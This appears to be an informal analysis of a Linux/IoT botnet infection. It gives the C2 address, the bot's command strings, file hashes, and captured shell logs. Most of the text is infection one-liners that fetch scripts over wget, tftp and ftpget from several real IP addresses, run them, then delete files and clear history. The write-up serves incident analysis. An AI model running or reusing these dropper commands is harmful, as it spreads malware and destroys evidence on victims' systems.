a telnet (IRC-like) BOTNET
'''
nc -nv 192.3.7.154 23
(UNKNOWN) [192.3.7.154] 23 (telnet) open
!* SCANNER ON
!* FATCOCK
'''

due to strings i guess its an irc botnet:
"""
PONG!
GETLOCALIP
My IP: %s
SCANNER
SCANNER ON | OFF
REMOVING PROBE
PROBING
HOLD
JUNK
HTTP
HTTP Flooding %s for %d seconds.
KILLATTK
""" 

what it does:
removes some services and replace them with "fake" versions
services like: ssh, bash, wget, ntpd ftp etc..


(i thought this was only spreading throught one server but nono)
first log file:

777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.3.7.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.3.7.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

signatures:

7250ff0dc2f310357e8e03ef796d9239:119890:apache2
16ff26d4c123b56bf68b63b7e259a1ca:114768:bash
14e52b22c737e02df7824b47a1687764:1592:bins.sh
4cf807b9d54346d7928030aaf22eb367:112632:cron
e0404b5804f92dd626b762cef05b0a57:99290:ftp
43070a6d279bfeec0e12a9dc88f5ffaa:149270:ntpd
fda3870f7dc941265e7a61efe571c283:107461:openssh
ab099fbd64b76d68d4f45a92814f2e7d:117893:pftp
5d2fc167792d730e1b8b7f58a4c5e5d4:126634:sh
bb9e4cdfb0b9d127c2616e2561de9111:149270:sshd
ac1db222507d9b29f2387cdc1aabf32a:142308:tftp
b3c5ec9c42e5865300e05323e47f80c6:99290:wget






this virus/worm seem to spreading from different places but  192.3.7.154 seems to be the 
source

second log 2h later:

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget 
http://179.43.141.229/bin.sh || wget http://179.43.141.229/bin.sh || busybox tftp -r bin2.sh -
g 179.43.141.229 || tftp -r bin2.sh -g 179.43.141.229 || busybox tftp 179.43.141.229 -c get 
bin3.sh || tftp 179.43.141.229 -c get bin3.sh || busybox ftpget 179.43.141.229 bin4.sh bin4.sh 
|| ftpget 179.43.141.229 bin4.sh bin4.sh;sh bin.sh || sh bin2.sh || sh bin3.sh || sh 
bin4.sh;rm -f *;exit




cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://179.43.141.229/bin.sh || wget http://179.43.141.229/bin.sh || busybox tftp -r bin2.sh -g 179.43.141.229 || tftp -r bin2.sh -g 179.43.141.229 || busybox tftp 179.43.141.229 -c get bin3.sh || tftp 179.43.141.229 -c get bin3.sh || busybox ftpget 179.43.141.229 bin4.sh bin4.sh || ftpget 179.43.141.229 bin4.sh bin4.sh;sh bin.sh || sh bin2.sh || sh bin3.sh || sh bin4.sh;rm -f *;exit


root@server:~# sh || bash || shell
 cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208.73.23.43/one.sh || wget http://208.73.23.43/one.sh || busybox ftpget 208.73.23.43 four.sh four.sh || ftpget 208.73.23.43 four.sh four.sh || busybox tftp -r two.sh -g 208.73.23.43 || tftp -r two.sh -g 208.73.23.43 || busybox tftp 208.73.23.43 -c get three.sh || tftp 208.73.23.43 -c get three.sh;sh one.sh || sh two.sh || sh three.sh || sh four.sh;rm -f *;exit &

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208.73.23.43/one.sh || wget http://208.73.23.43/one.sh || busybox ftpget 208.73.23.43 four.sh four.sh || ftpget 208.73.23.43 four.sh four.sh || busybox tftp -r two.sh -g 208.73.23.43 || tftp -r two.sh -g 208.73.23.43 || busybox tftp 208.73.23.43 -c get three.sh || tftp 208.73.23.43 -c get three.sh;sh one.sh || sh two.sh || sh three.sh || sh four.sh;rm -f *;exit &






777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.3.7.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.3.7.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192.3.7.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.3.7.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.7.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c